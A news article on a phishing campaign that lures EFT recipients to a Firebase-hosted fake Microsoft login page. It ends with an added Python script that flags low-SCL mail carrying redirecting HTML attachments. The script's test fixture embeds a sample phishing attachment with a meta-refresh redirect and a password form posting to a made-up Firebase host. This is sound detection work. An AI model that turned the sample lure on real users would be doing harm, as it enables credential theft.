A phishing attack recently uncovered by researchers pretends to share information about an electronic funds transfer (EFT) by offering up a link to download an HTML invoice, which then loads a Microsoft Office-branded page hosted on Google Firebase.
The attack culminates with a final phishing page that looks to extract a victim’s Microsoft login credentials, alternate email address, and phone number, Armorblox researchers wrote in a blog post.
Impersonating Microsoft to phish for account credentials continues to be a powerful technique because it’s a way for attackers to insert themselves into normal business workflows, said Rajat Upadhyaya, head of engineering at Armorblox.
“Viewing documents via Office 365 is something we do every day, so victims might think it's not unusual to enter login credentials in this situation,” Upadhyaya said. “Plus, hosting the final phishing page on Google Firebase lends the domain inherent legitimacy and allows it to bypass email security blocklists and filters.”
The email attack bypassed native Microsoft email security controls: Microsoft assigned the message a Spam Confidence Level (SCL) of ‘1’, meaning the tech giant did not judge the email suspicious and delivered it to end-user mailboxes.
“The individual techniques have been employed by hackers before, but it's the combination of techniques that makes it possible for this email attack to bypass Microsoft email security as well as pass the eye tests of victims,” Upadhyaya said.
“Employing link redirects and a downloadable HTML file to view the final payload makes it difficult for security technologies to follow the link to its final destination,” he explained.
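The two defensive signals the article points at, a low SCL that lets the message through and an HTML attachment whose only job is to navigate the browser somewhere else, can both be checked on the mail server side before the message reaches a mailbox. The script below is an added example written for this article, not code from Armorblox or Microsoft. It parses a constructed sample email (the sender, recipient and `invoice-viewer-example.firebaseapp.com` host are made up; the `X-MS-Exchange-Organization-SCL` header and the `.firebaseapp.com` / `.web.app` Firebase Hosting suffixes are real), reads the SCL, and walks any HTML attachment looking for meta-refresh redirects, script-driven `location` assignments and form actions, flagging those that point at a generic cloud-hosting domain.

```python
import re
from email import message_from_string
from urllib.parse import urlparse
from html.parser import HTMLParser

# Domain suffixes handed out by Firebase Hosting (known facts, not IoCs from the article).
CLOUD_HOSTING_SUFFIXES = (".firebaseapp.com", ".web.app")

# Microsoft treats SCL 5 and above as spam; 0 or 1 means "not spam".
SCL_SPAM_THRESHOLD = 5


class _NavigationExtractor(HTMLParser):
    """Collect every URL an HTML attachment would redirect to, link to, or post to."""

    def __init__(self):
        super().__init__()
        self.urls = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # <meta http-equiv="refresh" content="0; url=https://...">
            m = re.search(r"url\s*=\s*['\"]?([^'\";\s]+)", a.get("content", ""), re.I)
            if m:
                self.urls.append(m.group(1))
        elif tag == "form" and a.get("action"):
            self.urls.append(a["action"])
        elif tag == "a" and a.get("href"):
            self.urls.append(a["href"])
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            # window.location = "..." / location.href = "..."
            for m in re.finditer(r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]", data):
                self.urls.append(m.group(1))


def extract_navigation_targets(html: str) -> list:
    parser = _NavigationExtractor()
    parser.feed(html)
    return parser.urls


def triage_message(raw: str) -> dict:
    """Return SCL and HTML-attachment navigation findings for one RFC 822 message."""
    msg = message_from_string(raw)
    scl_header = msg.get("X-MS-Exchange-Organization-SCL")
    scl = int(scl_header) if scl_header is not None else None
    targets, cloud_hosted = [], []
    for part in msg.walk():
        if part.get_content_type() == "text/html" and part.get_filename():
            html = part.get_payload(decode=True).decode("utf-8", "replace")
            for url in extract_navigation_targets(html):
                targets.append(url)
                host = urlparse(url).hostname or ""
                if host.endswith(CLOUD_HOSTING_SUFFIXES):
                    cloud_hosted.append(url)
    return {
        "scl": scl,
        "scl_flagged": scl is not None and scl >= SCL_SPAM_THRESHOLD,
        "attachment_targets": targets,
        "cloud_hosted_targets": cloud_hosted,
        # An HTML attachment that exists only to send the browser elsewhere is
        # worth quarantining even when the spam filter let the message through.
        "suspicious": bool(cloud_hosted),
    }


# Constructed sample message modelled on the lure described in the article.
SAMPLE_EMAIL = """\
From: billing@example-sender.test
To: victim@example.test
Subject: EFT payment notification
X-MS-Exchange-Organization-SCL: 1
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please find the attached invoice for the electronic funds transfer.
--b1
Content-Type: text/html; name="invoice.html"
Content-Disposition: attachment; filename="invoice.html"
Content-Transfer-Encoding: 7bit

<html><head>
<meta http-equiv="refresh" content="0; url=https://invoice-viewer-example.firebaseapp.com/login">
</head><body>
<form action="https://invoice-viewer-example.firebaseapp.com/submit" method="post">
<input name="email"><input name="password" type="password">
</form>
</body></html>
--b1--
"""

if __name__ == "__main__":
    for key, value in triage_message(SAMPLE_EMAIL).items():
        print(f"{key}: {value}")
```

The point of the `suspicious` verdict is that it is independent of the SCL: the sample carries SCL 1, exactly the value the article reports, and would pass a filter that trusts that score alone, yet the attachment's only navigation targets are a credential form and a redirect on a shared hosting domain that has no relationship to the sender.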